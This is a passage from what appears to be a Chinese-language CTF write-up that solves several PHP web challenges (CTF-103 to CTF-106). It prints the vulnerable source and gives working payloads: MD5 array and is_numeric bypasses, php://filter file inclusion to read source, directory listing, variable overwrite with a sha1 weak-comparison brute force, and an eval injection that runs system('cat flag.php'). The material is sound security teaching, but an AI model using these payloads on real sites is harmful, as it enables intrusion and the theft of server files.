   </span><span class="pun">{</span></code></li><li class="L2"><code class="lang-php"><span class="pln">                 </span><span class="kwd">if</span><span class="pun">(</span><span class="pln">$passwd</span><span class="pun">==</span><span class="lit">1234567</span><span class="pun">)</span></code></li><li class="L3"><code class="lang-php"><span class="pln">                 </span><span class="pun">{</span></code></li><li class="L4"><code class="lang-php"><span class="pln">                     echo </span><span class="str">'Good Job!'</span><span class="pun">;</span></code></li><li class="L5"><code class="lang-php"><span class="pln">                     highlight_file</span><span class="pun">(</span><span class="str">'flag.php'</span><span class="pun">);</span></code></li><li class="L6"><code class="lang-php"><span class="pln">                     </span><span class="kwd">die</span><span class="pun">(</span><span class="str">'By Retr_0'</span><span class="pun">);</span></code></li><li class="L7"><code class="lang-php"><span class="pln">                 </span><span class="pun">}</span></code></li><li class="L8"><code class="lang-php"><span class="pln">                 </span><span class="kwd">else</span></code></li><li class="L9"><code class="lang-php"><span class="pln">                 </span><span class="pun">{</span></code></li><li class="L0"><code class="lang-php"><span class="pln">                     echo </span><span class="str">"can you think twice??"</span><span class="pun">;</span></code></li><li class="L1"><code class="lang-php"><span class="pln">                 </span><span class="pun">}</span></code></li><li class="L2"><code class="lang-php"><span class="pln">            </span><span class="pun">}</span></code></li><li class="L3"><code class="lang-php"><span class="pln">            </span><span class="kwd">else</span><span class="pun">{</span></code></li><li class="L4"><code class="lang-php"><span class="pln">                echo </span><span class="str">'You can not get it !'</span><span class="pun">;</span></code></li><li class="L5"><code class="lang-php"><span class="pln">            </span><span class="pun">}</span></code></li><li class="L6"><code class="lang-php"><span class="pln">        </span><span class="pun">}</span></code></li><li class="L7"><code class="lang-php"><span class="pln">        </span><span class="kwd">else</span><span class="pun">{</span></code></li><li class="L8"><code class="lang-php"><span class="pln">            </span><span class="kwd">die</span><span class="pun">(</span><span class="str">'only one way to get the flag'</span><span class="pun">);</span></code></li><li class="L9"><code class="lang-php"><span class="pln">        </span><span class="pun">}</span></code></li><li class="L0"><code class="lang-php"><span class="pun">}</span></code></li><li class="L1"><code class="lang-php"><span class="pln">    </span><span class="kwd">else</span><span class="pln"> </span><span class="pun">{</span></code></li><li class="L2"><code class="lang-php"><span class="pln">        echo </span><span class="str">"You are not a real hacker!"</span><span class="pun">;</span></code></li><li class="L3"><code class="lang-php"><span class="pln">    </span><span class="pun">}</span></code></li><li class="L4"><code class="lang-php"><span class="pun">}</span></code></li><li class="L5"><code class="lang-php"><span class="kwd">else</span><span class="pun">{</span></code></li><li class="L6"><code class="lang-php"><span class="pln">    </span><span class="kwd">die</span><span class="pun">(</span><span class="str">'Please input first'</span><span class="pun">);</span></code></li><li class="L7"><code class="lang-php"><span class="pun">}</span></code></li><li class="L8"><code class="lang-php"><span class="pun">?&gt;</span></code></li></ol></pre>
<p><strong>第一层：</strong> <code>md5($id) === md5($gg) &amp;&amp; $id !== $gg</code> </p>
<p><strong>MD5强相等，数组绕过即可</strong> <code>/index.php?id[]=1&amp;gg[]=2</code> </p>
<p><strong>第二层：</strong> <code>!is_numeric($passwd) &amp;&amp;  $passwd==1234567</code> </p>
<p><strong>is_numeric()绕过：十六进制绕过、%00截断绕过、弱类型比较绕过均可 </strong> <code>POST: passwd=1234567a</code></p>
<h3 id="h3-payload"><a name="payload" class="reference-link"></a><span class="header-link octicon octicon-link"></span>payload</h3><p><img src="https://nc0.cdn.zkaq.cn/md/5597/b67bf4bc872254dade1534b616c25834_80134.png" alt=""></p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pun">?</span><span class="pln">id</span><span class="pun">[]=</span><span class="lit">1</span><span class="pun">&amp;</span><span class="pln">gg</span><span class="pun">[]=</span><span class="lit">2</span></code></li><li class="L1"><code></code></li><li class="L2"><code><span class="pln">POST</span><span class="pun">:</span><span class="pln">    passwd</span><span class="pun">=</span><span class="lit">1234567a</span></code></li></ol></pre><h2 id="h2-ctf-104"><a name="CTF-104" class="reference-link"></a><span class="header-link octicon octicon-link"></span>CTF-104</h2><pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pln">include $_GET</span><span class="pun">[</span><span class="str">'file'</span><span class="pun">]</span><span class="pln"> </span><span class="pun">复制</span></code></li></ol></pre><p>目测为文件包含，尝试读index.php的源码，</p>
<blockquote>
<p>index.php?file=php://filter/read=convert.base64-encode/resource=index.php</p>
</blockquote>
<p>发现被加密还原后如下：</p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-php"><span class="pun">&lt;?</span><span class="pln">php</span></code></li><li class="L1"><code class="lang-php"><span class="pln">$a </span><span class="pun">=</span><span class="pln"> </span><span class="lit">@$_GET</span><span class="pun">[</span><span class="str">'file'</span><span class="pun">];</span></code></li><li class="L2"><code class="lang-php"><span class="kwd">if</span><span class="pln"> </span><span class="pun">(!</span><span class="pln">$a</span><span class="pun">)</span><span class="pln"> </span><span class="pun">{</span></code></li><li class="L3"><code class="lang-php"><span class="pln">    $a </span><span class="pun">=</span><span class="pln"> </span><span class="str">'index.html'</span><span class="pun">;</span></code></li><li class="L4"><code class="lang-php"><span class="pun">}</span></code></li><li class="L5"><code class="lang-php"><span class="pln">echo </span><span class="str">'include $_GET[\'file\']'</span><span class="pun">;</span></code></li><li class="L6"><code class="lang-php"><span class="kwd">if</span><span class="pln"> </span><span class="pun">(</span><span class="pln">strpos</span><span class="pun">(</span><span class="str">'flag'</span><span class="pun">,</span><span class="pln">$a</span><span class="pun">)!==</span><span class="kwd">false</span><span class="pun">)</span><span class="pln"> </span><span class="pun">{</span></code></li><li class="L7"><code class="lang-php"><span class="pln">    </span><span class="kwd">die</span><span class="pun">(</span><span class="str">'nonono'</span><span class="pun">);</span></code></li><li class="L8"><code class="lang-php"><span class="pun">}</span></code></li><li class="L9"><code class="lang-php"><span class="pln">include $a</span><span class="pun">;</span></code></li><li class="L0"><code class="lang-php"><span class="pun">?&gt;</span></code></li><li class="L1"><code class="lang-php"></code></li><li class="L2"><code class="lang-php"><span class="com">&lt;!--base64: ZGlyLnBocA== --&gt;</span></code></li></ol></pre>
<p>发现提示，其实右击查看源代码也可以看到..</p>
<p><code>&lt;!--base64: ZGlyLnBocA== --&gt;</code></p>
<p>base64解码后得到dir.php</p>
<p>读dir.php</p>
<blockquote>
<p>index.php?file=php://filter/read=convert.base64-encode/resource=dir.php</p>
</blockquote>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pun">&lt;?</span><span class="pln">php</span></code></li><li class="L1"><code><span class="pln">$a </span><span class="pun">=</span><span class="pln"> </span><span class="lit">@$_GET</span><span class="pun">[</span><span class="str">'dir'</span><span class="pun">];</span></code></li><li class="L2"><code><span class="kwd">if</span><span class="pun">(!</span><span class="pln">$a</span><span class="pun">){</span></code></li><li class="L3"><code><span class="pln">$a </span><span class="pun">=</span><span class="pln"> </span><span class="str">'/tmp'</span><span class="pun">;</span></code></li><li class="L4"><code><span class="pun">}</span></code></li><li class="L5"><code><span class="pln">var_dump</span><span class="pun">(</span><span class="pln">scandir</span><span class="pun">(</span><span class="pln">$a</span><span class="pun">));</span></code></li></ol></pre><p>得知该文件可以列目录，尝试列目录</p>
<blockquote>
<p>dir.php?dir=/</p>
</blockquote>
<p><img src="https://nc0.cdn.zkaq.cn/md/5597/58302ebdf4252d171f1ebfbda75fe3cf_54111.png" alt=""></p>
<p>列目录看到存放站点文件的文件夹www</p>
<p>再列目录</p>
<p><code>dir.php?dir=/www</code></p>
<p><img src="https://nc0.cdn.zkaq.cn/md/5597/150c34c1597a40c0c5853c4055070573_81362.png" alt=""></p>
<p>这样得到flag123.php文件</p>
<p>使用file读取，得到flag</p>
<blockquote>
<p><code>index.php/?file=php://filter/read=convert.base64-encode/resource=flag123.php</code></p>
</blockquote>
<h2 id="h2-ctf-105"><a name="CTF-105" class="reference-link"></a><span class="header-link octicon octicon-link"></span>CTF-105</h2><h4 id="h4-u8003u70B9"><a name="考点" class="reference-link"></a><span class="header-link octicon octicon-link"></span>考点</h4><pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pun">注意给</span><span class="pln">hint </span><span class="pun">?</span><span class="pln">source</span><span class="pun">=</span><span class="lit">1</span></code></li></ol></pre><ol>
<li>变量覆盖</li><li>php弱类型 爆破sha1，md5弱类型</li><li>php复杂变量getshell</li></ol>
<h4 id="h4-u4EE3u7801"><a name="代码" class="reference-link"></a><span class="header-link octicon octicon-link"></span>代码</h4><pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-php"><span class="pln"> </span><span class="pun">&lt;?</span><span class="pln">php</span></code></li><li class="L1"><code class="lang-php"></code></li><li class="L2"><code class="lang-php"><span class="pln">$adminPassword </span><span class="pun">=</span><span class="pln"> </span><span class="str">'d8b8caf4df69a81f2815pbcb74cd73ab'</span><span class="pun">;</span></code></li><li class="L3"><code class="lang-php"><span class="kwd">if</span><span class="pln"> </span><span class="pun">(!</span><span class="pln">function_exists</span><span class="pun">(</span><span class="str">'fuxkSQL'</span><span class="pun">))</span><span class="pln"> </span><span class="pun">{</span></code></li><li class="L4"><code class="lang-php"><span class="pln">    </span><span class="kwd">function</span><span class="pln"> fuxkSQL</span><span class="pun">(</span><span class="pln">$iText</span><span class="pun">)</span></code></li><li class="L5"><code class="lang-php"><span class="pln">    </span><span class="pun">{</span></code></li><li class="L6"><code class="lang-php"><span class="pln">        $oText </span><span class="pun">=</span><span class="pln"> $iText</span><span class="pun">;</span></code></li><li class="L7"><code class="lang-php"><span class="pln">        $oText </span><span class="pun">=</span><span class="pln"> str_replace</span><span class="pun">(</span><span class="str">'\\\\'</span><span class="pun">,</span><span class="pln"> </span><span class="str">'\\'</span><span class="pun">,</span><span class="pln"> $oText</span><span class="pun">);</span></code></li><li class="L8"><code class="lang-php"><span class="pln">        $oText </span><span class="pun">=</span><span class="pln"> str_replace</span><span class="pun">(</span><span class="str">'\"'</span><span class="pun">,</span><span class="pln"> </span><span class="str">'"'</span><span class="pun">,</span><span class="pln"> $oText</span><span class="pun">);</span></code></li><li class="L9"><code class="lang-php"><span class="pln">        $oText </span><span class="pun">=</span><span class="pln"> str_replace</span><span class="pun">(</span><span class="str">"\'"</span><span class="pun">,</span><span class="pln"> </span><span class="str">"'"</span><span class="pun">,</span><span class="pln"> $oText</span><span class="pun">);</span></code></li><li class="L0"><code class="lang-php"><span class="pln">        $oText </span><span class="pun">=</span><span class="pln"> str_replace</span><span class="pun">(</span><span class="str">"'"</span><span class="pun">,</span><span class="pln"> </span><span class="str">"''"</span><span class="pun">,</span><span class="pln"> $oText</span><span class="pun">);</span></code></li><li class="L1"><code class="lang-php"><span class="pln">        </span><span class="kwd">return</span><span class="pln"> $oText</span><span class="pun">;</span></code></li><li class="L2"><code class="lang-php"><span class="pln">    </span><span class="pun">}</span></code></li><li class="L3"><code class="lang-php"><span class="pun">}</span></code></li><li class="L4"><code class="lang-php"><span class="kwd">if</span><span class="pln"> </span><span class="pun">(!</span><span class="pln">function_exists</span><span class="pun">(</span><span class="str">'getVars'</span><span class="pun">))</span><span class="pln"> </span><span class="pun">{</span></code></li><li class="L5"><code class="lang-php"><span class="pln">    </span><span class="kwd">function</span><span class="pln"> getVars</span><span class="pun">()</span></code></li><li class="L6"><code class="lang-php"><span class="pln">    </span><span class="pun">{</span></code></li><li class="L7"><code class="lang-php"><span class="pln">        $totals </span><span class="pun">=</span><span class="pln"> array_merge</span><span class="pun">(</span><span class="pln">$_GET</span><span class="pun">,</span><span class="pln"> $_POST</span><span class="pun">);</span></code></li><li class="L8"><code class="lang-php"><span class="pln">        </span><span class="kwd">if</span><span class="pln"> </span><span class="pun">(</span><span class="pln">count</span><span class="pun">(</span><span class="pln">$_GET</span><span class="pun">))</span><span class="pln"> </span><span class="pun">{</span></code></li><li class="L9"><code class="lang-php"><span class="pln">            </span><span class="kwd">foreach</span><span class="pln"> </span><span class="pun">(</span><span class="pln">$_GET </span><span class="kwd">as</span><span class="pln"> $key </span><span class="pun">=&gt;</span><span class="pln"> $value</span><span class="pun">)</span><span class="pln"> </span><span class="pun">{</span></code></li><li class="L0"><code class="lang-php"><span class="pln">                </span><span class="kwd">global</span><span class="pln"> $</span><span class="pun">{</span><span class="pln">$key</span><span class="pun">};</span></code></li><li class="L1"><code class="lang-php"><span class="pln">                </span><span class="kwd">if</span><span class="pln"> </span><span class="pun">(</span><span class="pln">is_array</span><span class="pun">(</span><span class="pln">$value</span><span class="pun">))</span><span class="pln"> </span><span class="pun">{</span></code></li><li class="L2"><code class="lang-php"><span class="pln">                    $temp_array </span><span class="pun">=</span><span class="pln"> array</span><span class="pun">();</span></code></li><li class="L3"><code class="lang-php"><span class="pln">                    </span><span class="kwd">foreach</span><span class="pln"> </span><span class="pun">(</span><span class="pln">$value </span><span class="kwd">as</span><span class="pln"> $key2 </span><span class="pun">=&gt;</span><span class="pln"> $value2</span><span class="pun">)</span><span class="pln"> </span><span class="pun">{</span></code></li><li class="L4"><code class="lang-php"><span class="pln">                        </span><span class="kwd">if</span><span class="pln"> </span><span class="pun">(</span><span class="pln">function_exists</span><span class="pun">(</span><span class="str">'mysql_real_escape_string'</span><span class="pun">))</span><span class="pln"> </span><span class="pun">{</span></code></li><li class="L5"><code class="lang-php"><span class="pln">                            $temp_array</span><span class="pun">[</span><span class="pln">$key2</span><span class="pun">]</span><span class="pln"> </span><span class="pun">=</span><span class="pln"> fuxkSQL</span><span class="pun">(</span><span class="pln">trim</span><span class="pun">(</span><span class="pln">$value2</span><span class="pun">));</span></code></li><li class="L6"><code class="lang-php"><span class="pln">                        </span><span class="pun">}</span><span class="pln"> </span><span class="kwd">else</span><span class="pln"> </span><span class="pun">{</span></code></li><li class="L7"><code class="lang-php"><span class="pln">                            $temp_array</span><span class="pun">[</span><span class="pln">$key2</span><span class="pun">]</span><span class="pln"> </span><span class="pun">=</span><span class="pln"> str_replace</span><span class="pun">(</span><span class="str">'"'</span><span class="pun">,</span><span class="pln"> </span><span class="str">'\"'</span><span class="pun">,</span><span class="pln"> str_replace</span><span class="pun">(</span><span class="str">"'"</span><span class="pun">,</span><span class="pln"> </span><span class="str">"\'"</span><span class="pun">,</span><span class="pln"> </span><span class="pun">(</span><span class="pln">trim</span><span class="pun">(</span><span class="pln">$value2</span><span class="pun">))));</span></code></li><li class="L8"><code class="lang-php"><span class="pln">                        </span><span class="pun">}</span></code></li><li class="L9"><code class="lang-php"><span class="pln">                    </span><span class="pun">}</span></code></li><li class="L0"><code class="lang-php"><span class="pln">                    $</span><span class="pun">{</span><span class="pln">$key</span><span class="pun">}</span><span class="pln"> </span><span class="pun">=</span><span class="pln"> $_GET</span><span class="pun">[</span><span class="pln">$key</span><span class="pun">]</span><span class="pln"> </span><span class="pun">=</span><span class="pln"> $temp_array</span><span class="pun">;</span></code></li><li class="L1"><code class="lang-php"><span class="pln">                </span><span class="pun">}</span><span class="pln"> </span><span class="kwd">else</span><span class="pln"> </span><span class="pun">{</span></code></li><li class="L2"><code class="lang-php"><span class="pln">                    </span><span class="kwd">if</span><span class="pln"> </span><span class="pun">(</span><span class="pln">function_exists</span><span class="pun">(</span><span class="str">'mysql_real_escape_string'</span><span class="pun">))</span><span class="pln"> </span><span class="pun">{</span></code></li><li class="L3"><code class="lang-php"><span class="pln">                        $</span><span class="pun">{</span><span class="pln">$key</span><span class="pun">}</span><span class="pln"> </span><span class="pun">=</span><span class="pln"> fuxkSQL</span><span class="pun">(</span><span class="pln">trim</span><span class="pun">(</span><span class="pln">$value</span><span class="pun">));</span></code></li><li class="L4"><code class="lang-php"><span class="pln">                    </span><span class="pun">}</span><span class="pln"> </span><span class="kwd">else</span><span class="pln"> </span><span class="pun">{</span></code></li><li class="L5"><code class="lang-php"><span class="pln">                        $</span><span class="pun">{</span><span class="pln">$key</span><span class="pun">}</span><span class="pln"> </span><span class="pun">=</span><span class="pln"> $_GET</span><span class="pun">[</span><span class="pln">$key</span><span class="pun">]</span><span class="pln"> </span><span class="pun">=</span><span class="pln"> str_replace</span><span class="pun">(</span><span class="str">'"'</span><span class="pun">,</span><span class="pln"> </span><span class="str">'\"'</span><span class="pun">,</span><span class="pln"> str_replace</span><span class="pun">(</span><span class="str">"'"</span><span class="pun">,</span><span class="pln"> </span><span class="str">"\'"</span><span class="pun">,</span><span class="pln"> </span><span class="pun">(</span><span class="pln">trim</span><span class="pun">(</span><span class="pln">$value</span><span class="pun">))));</span></code></li><li class="L6"><code class="lang-php"><span class="pln">                    </span><span class="pun">}</span></code></li><li class="L7"><code class="lang-php"><span class="pln">                </span><span class="pun">}</span></code></li><li class="L8"><code class="lang-php"><span class="pln">            </span><span class="pun">}</span></code></li><li class="L9"><code class="lang-php"><span class="pln">        </span><span class="pun">}</span></code></li><li class="L0"><code class="lang-php"><span class="pln">    </span><span class="pun">}</span></code></li><li class="L1"><code class="lang-php"><span class="pun">}</span></code></li><li class="L2"><code class="lang-php"></code></li><li class="L3"><code class="lang-php"><span class="pln">getVars</span><span class="pun">();</span></code></li><li class="L4"><code class="lang-php"><span class="kwd">if</span><span class="pln"> </span><span class="pun">(</span><span class="pln">isset</span><span class="pun">(</span><span class="pln">$source</span><span class="pun">))</span><span class="pln"> </span><span class="pun">{</span></code></li><li class="L5"><code class="lang-php"><span class="pln">    highlight_file</span><span class="pun">(</span><span class="pln">__FILE__</span><span class="pun">);</span></code></li><li class="L6"><code class="lang-php"><span class="pun">}</span></code></li><li class="L7"><code class="lang-php"></code></li><li class="L8"><code class="lang-php"><span class="com">//只有admin才能设置环境变量</span></code></li><li class="L9"><code class="lang-php"><span class="kwd">if</span><span class="pln"> </span><span class="pun">(</span><span class="pln">md5</span><span class="pun">(</span><span class="pln">$password</span><span class="pun">)</span><span class="pln"> </span><span class="pun">===</span><span class="pln"> $adminPassword </span><span class="pun">&amp;&amp;</span><span class="pln"> sha1</span><span class="pun">(</span><span class="pln">$verif</span><span class="pun">)</span><span class="pln"> </span><span class="pun">==</span><span class="pln"> $verif</span><span class="pun">)</span><span class="pln"> </span><span class="pun">{</span></code></li><li class="L0"><code class="lang-php"><span class="pln">    echo </span><span class="str">'you can set config variables!!'</span><span class="pln"> </span><span class="pun">.</span><span class="pln"> </span><span class="str">'&lt;/br&gt;'</span><span class="pun">;</span></code></li><li class="L1"><code class="lang-php"><span class="pln">    </span><span class="kwd">foreach</span><span class="pln"> </span><span class="pun">(</span><span class="pln">array_keys</span><span class="pun">(</span><span class="pln">$GLOBALS</span><span class="pun">)</span><span class="pln"> </span><span class="kwd">as</span><span class="pln"> $key</span><span class="pun">)</span><span class="pln"> </span><span class="pun">{</span></code></li><li class="L2"><code class="lang-php"><span class="pln">        </span><span class="kwd">if</span><span class="pln"> </span><span class="pun">(</span><span class="pln">preg_match</span><span class="pun">(</span><span class="str">'/var\d{1,2}/'</span><span class="pun">,</span><span class="pln"> $key</span><span class="pun">)</span><span class="pln"> </span><span class="pun">&amp;&amp;</span><span class="pln"> strlen</span><span class="pun">(</span><span class="pln">$GLOBALS</span><span class="pun">[</span><span class="pln">$key</span><span class="pun">])</span><span class="pln"> </span><span class="pun">&lt;</span><span class="pln"> </span><span class="lit">12</span><span class="pun">)</span><span class="pln"> </span><span class="pun">{</span></code></li><li class="L3"><code class="lang-php"><span class="pln">            </span><span class="lit">@eval</span><span class="pun">(</span><span class="str">"\$$key"</span><span class="pln"> </span><span class="pun">.</span><span class="pln"> </span><span class="str">'="'</span><span class="pln"> </span><span class="pun">.</span><span class="pln"> $GLOBALS</span><span class="pun">[</span><span class="pln">$key</span><span class="pun">]</span><span class="pln"> </span><span class="pun">.</span><span class="pln"> </span><span class="str">'";'</span><span class="pun">);</span></code></li><li class="L4"><code class="lang-php"><span class="pln">        </span><span class="pun">}</span></code></li><li class="L5"><code class="lang-php"><span class="pln">    </span><span class="pun">}</span></code></li><li class="L6"><code class="lang-php"><span class="pun">}</span><span class="pln"> </span><span class="kwd">else</span><span class="pln"> </span><span class="pun">{</span></code></li><li class="L7"><code class="lang-php"><span class="pln">    </span><span class="kwd">foreach</span><span class="pln"> </span><span class="pun">(</span><span class="pln">array_keys</span><span class="pun">(</span><span class="pln">$GLOBALS</span><span class="pun">)</span><span class="pln"> </span><span class="kwd">as</span><span class="pln"> $key</span><span class="pun">)</span><span class="pln"> </span><span class="pun">{</span></code></li><li class="L8"><code class="lang-php"><span class="pln">        </span><span class="kwd">if</span><span class="pln"> </span><span class="pun">(</span><span class="pln">preg_match</span><span class="pun">(</span><span class="str">'/var\d{1,2}/'</span><span class="pun">,</span><span class="pln"> $key</span><span class="pun">))</span><span class="pln"> </span><span class="pun">{</span></code></li><li class="L9"><code class="lang-php"><span class="pln">            echo </span><span class="pun">(</span><span class="pln">$GLOBALS</span><span class="pun">[</span><span class="pln">$key</span><span class="pun">])</span><span class="pln"> </span><span class="pun">.</span><span class="pln"> </span><span class="str">'&lt;/br&gt;'</span><span class="pun">;</span></code></li><li class="L0"><code class="lang-php"><span class="pln">        </span><span class="pun">}</span></code></li><li class="L1"><code class="lang-php"><span class="pln">    </span><span class="pun">}</span></code></li><li class="L2"><code class="lang-php"><span class="pun">}</span></code></li></ol></pre>
<h4 id="h4--waf"><a name="奇奇怪怪的waf" class="reference-link"></a><span class="header-link octicon octicon-link"></span>奇奇怪怪的waf</h4><p>因为环境是php7，所以没有mysql_real_escape_string函数，直接分析下面一半，相当于对单引号和双引号进行转义，但是反斜杠没有做任何操作。</p>
<h4 id="h4-u53D8u91CFu8986u76D6"><a name="变量覆盖" class="reference-link"></a><span class="header-link octicon octicon-link"></span>变量覆盖</h4><pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-php"><span class="pln">$adminPassword </span><span class="pun">=</span><span class="pln"> </span><span class="str">'d8b8caf4df69a81f2815pbcb74cd73ab'</span><span class="pun">;</span></code></li><li class="L1"><code class="lang-php"><span class="kwd">foreach</span><span class="pln"> </span><span class="pun">(</span><span class="pln">$_GET </span><span class="kwd">as</span><span class="pln"> $key </span><span class="pun">=&gt;</span><span class="pln"> $value</span><span class="pun">)</span><span class="pln"> </span><span class="pun">{</span></code></li><li class="L2"><code class="lang-php"><span class="pln">  </span><span class="kwd">global</span><span class="pln"> $</span><span class="pun">{</span><span class="pln">$key</span><span class="pun">};</span></code></li><li class="L3"><code class="lang-php"><span class="pun">}</span></code></li></ol></pre>
<ul>
<li>这个功能可以将$_GET中的键值直接转为变量类似于 xxx?password=1 那么就能覆盖$admin变量。</li><li>我们发现了这个adminPassword有很大的问题，这压根就不是md5。</li></ul>
<p>要求</p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-php"><span class="pln">md5</span><span class="pun">(</span><span class="pln">$password</span><span class="pun">)</span><span class="pln"> </span><span class="pun">===</span><span class="pln"> $adminPassword </span><span class="pun">复制</span></code></li></ol></pre>
<ul>
<li>那么我们将$password覆盖为任意值，然后将$adminPassword覆盖为其md5值。即可过第一关。</li></ul>
<h4 id="h4-php-"><a name="php弱类型" class="reference-link"></a><span class="header-link octicon octicon-link"></span>php弱类型</h4><p>php弱类型比较，考虑一种特殊情况，sha1($a)=0exxx，相当于科学计数法0，那么，爆破找出任意0exxx的变量的sha1还是0exxx。</p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-php"><span class="pun">&lt;?</span><span class="pln">php</span></code></li><li class="L1"><code class="lang-php"><span class="kwd">for</span><span class="pln"> </span><span class="pun">(</span><span class="pln">$i5 </span><span class="pun">=</span><span class="pln"> </span><span class="lit">0</span><span class="pun">;</span><span class="pln"> $i5 </span><span class="pun">&lt;=</span><span class="pln"> </span><span class="lit">9999999999</span><span class="pun">;</span><span class="pln"> $i5</span><span class="pun">++)</span><span class="pln"> </span><span class="pun">{</span></code></li><li class="L2"><code class="lang-php"><span class="pln">    $res </span><span class="pun">=</span><span class="pln"> </span><span class="str">'0e'</span><span class="pln"> </span><span class="pun">.</span><span class="pln"> $i5</span><span class="pun">;</span></code></li><li class="L3"><code class="lang-php"><span class="pln">    </span><span class="com">//0e1290633704</span></code></li><li class="L4"><code class="lang-php"><span class="pln">    </span><span class="kwd">if</span><span class="pln"> </span><span class="pun">(</span><span class="pln">$res </span><span class="pun">==</span><span class="pln"> hash</span><span class="pun">(</span><span class="str">'sha1'</span><span class="pun">,</span><span class="pln"> $res</span><span class="pun">))</span><span class="pln"> </span><span class="pun">{</span></code></li><li class="L5"><code class="lang-php"><span class="pln">        print_r</span><span class="pun">(</span><span class="pln">$res</span><span class="pun">);</span></code></li><li class="L6"><code class="lang-php"><span class="pln">    </span><span class="pun">}</span></code></li><li class="L7"><code class="lang-php"><span class="pun">}</span></code></li></ol></pre>
<h4 id="h4-php-"><a name="php复杂变量" class="reference-link"></a><span class="header-link octicon octicon-link"></span>php复杂变量</h4><pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-php"><span class="kwd">foreach</span><span class="pln"> </span><span class="pun">(</span><span class="pln">array_keys</span><span class="pun">(</span><span class="pln">$GLOBALS</span><span class="pun">)</span><span class="pln"> </span><span class="kwd">as</span><span class="pln"> $key</span><span class="pun">)</span><span class="pln"> </span><span class="pun">{</span></code></li><li class="L1"><code class="lang-php"><span class="pln">        </span><span class="kwd">if</span><span class="pln"> </span><span class="pun">(</span><span class="pln">preg_match</span><span class="pun">(</span><span class="str">'/var\d{1,2}/'</span><span class="pun">,</span><span class="pln"> $key</span><span class="pun">)</span><span class="pln"> </span><span class="pun">&amp;&amp;</span><span class="pln"> strlen</span><span class="pun">(</span><span class="pln">$GLOBALS</span><span class="pun">[</span><span class="pln">$key</span><span class="pun">])</span><span class="pln"> </span><span class="pun">&lt;</span><span class="pln"> </span><span class="lit">12</span><span class="pun">)</span><span class="pln"> </span><span class="pun">{</span></code></li><li class="L2"><code class="lang-php"><span class="pln">            </span><span class="lit">@eval</span><span class="pun">(</span><span class="str">"\$$key"</span><span class="pln"> </span><span class="pun">.</span><span class="pln"> </span><span class="str">'="'</span><span class="pln"> </span><span class="pun">.</span><span class="pln"> $GLOBALS</span><span class="pun">[</span><span class="pln">$key</span><span class="pun">]</span><span class="pln"> </span><span class="pun">.</span><span class="pln"> </span><span class="str">'";'</span><span class="pun">);</span></code></li><li class="L3"><code class="lang-php"><span class="pln">        </span><span class="pun">}</span></code></li><li class="L4"><code class="lang-php"><span class="pln">    </span><span class="pun">}</span></code></li></ol></pre>
<ul>
<li>这段是将设置var开头，后面带1到2个数字变量的值，类似于var1=xxx;这样的</li><li>由于变量覆盖的环节限制了单双引号的输入，所以这里的解法为利用php复杂</li></ul>
<h4 id="h4--payload"><a name="最终payload" class="reference-link"></a><span class="header-link octicon octicon-link"></span>最终payload</h4><pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-php"><span class="pun">?</span><span class="pln">source</span><span class="pun">=</span><span class="lit">1</span><span class="pun">&amp;</span><span class="pln">adminPassword</span><span class="pun">=</span><span class="pln">c4ca4238a0b923820dcc509a6f75849b</span><span class="pun">&amp;</span><span class="pln">password</span><span class="pun">=</span><span class="lit">1</span><span class="pun">&amp;</span><span class="pln">verif</span><span class="pun">=</span><span class="lit">0e1290633704</span><span class="pun">&amp;</span><span class="pln">var1</span><span class="pun">=</span><span class="pln">$</span><span class="pun">{</span><span class="pln">$a</span><span class="pun">(</span><span class="pln">$b</span><span class="pun">)}&amp;</span><span class="pln">a</span><span class="pun">=</span><span class="pln">system</span><span class="pun">&amp;</span><span class="pln">b</span><span class="pun">=</span><span class="pln">cat flag</span><span class="pun">.</span><span class="pln">php</span></code></li></ol></pre>
<h4 id="h4--payload-"><a name="其他Payload:" class="reference-link"></a><span class="header-link octicon octicon-link"></span>其他Payload:</h4><pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pun">变量覆盖</span><span class="pln"> sha1</span><span class="pun">弱比较</span><span class="pln"> payload</span><span class="pun">:</span></code></li><li class="L1"><code><span class="str">`?adminPassword=202cb962ac59075b964b07152d234b70&amp;password=123&amp;verif=0e00000000000000000000081614617300000000`</span></code></li><li class="L2"><code><span class="pun">只是对值进行了过滤</span><span class="pln"> </span><span class="pun">可以用键来读取</span><span class="pln">flag</span></code></li><li class="L3"><code></code></li><li class="L4"><code></code></li><li class="L5"><code><span class="pun">?</span><span class="pln">adminPassword</span><span class="pun">=</span><span class="lit">202cb962ac59075b964b07152d234b70</span><span class="pun">&amp;</span><span class="pln">password</span><span class="pun">=</span><span class="lit">123</span><span class="pun">&amp;</span><span class="pln">verif</span><span class="pun">=</span><span class="lit">0e00000000000000000000081614617300000000</span><span class="pun">&amp;</span><span class="pln">GLOBALS</span><span class="pun">[</span><span class="pln">var1</span><span class="pun">;</span><span class="pln">system</span><span class="pun">(</span><span class="str">'cat flag.php'</span><span class="pun">);</span><span class="pln">$a</span><span class="pun">]=</span><span class="lit">1</span></code></li></ol></pre><h2 id="h2-ctf-106"><a name="CTF-106" class="reference-link"></a><span class="header-link octicon octicon-link"></span>CTF-106</h2><p><strong>访问flag.php</strong></p>
<p><strong>并未报404，flag.php存在，需要读取里面的内容获取flag</strong><br><img src="https://nc0.cdn.zkaq.cn/md/5597/ac1c4d97f6d7276105dc874bb827b276_61758.png" alt=""></p>
<p><strong>可以看到页面显示的是源码的二进制编码</strong></p>
<p><strong>2进制转换为10进制编码</strong></p>
<p><strong>10进制编码后再进行ASCII解码，得到源码</strong></p>
